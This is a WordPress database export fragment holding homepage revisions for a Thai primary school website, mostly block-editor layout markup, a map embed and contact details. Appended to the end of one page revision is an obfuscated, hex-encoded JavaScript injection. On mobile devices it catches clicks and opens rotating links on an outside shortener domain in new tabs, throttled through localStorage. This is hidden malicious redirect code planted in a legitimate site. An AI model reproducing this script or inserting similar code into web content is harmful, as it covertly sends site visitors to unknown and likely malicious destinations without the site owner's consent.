{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-02 15:34:58','2024-08-02 08:34:58','',14,'http://pakhaeng.ssk.in.th/?p=502',0,'revision','',0),
(503,1,'2024-08-02 15:50:08','2024-08-02 08:50:08','','Is It a Gift Instagram Post','','inherit','','closed','','is-it-a-gift-instagram-post','','','2024-08-02 15:50:08','2024-08-02 08:50:08','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png',0,'attachment','image/png',0),
(504,1,'2024-08-02 15:50:35','2024-08-02 08:50:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn 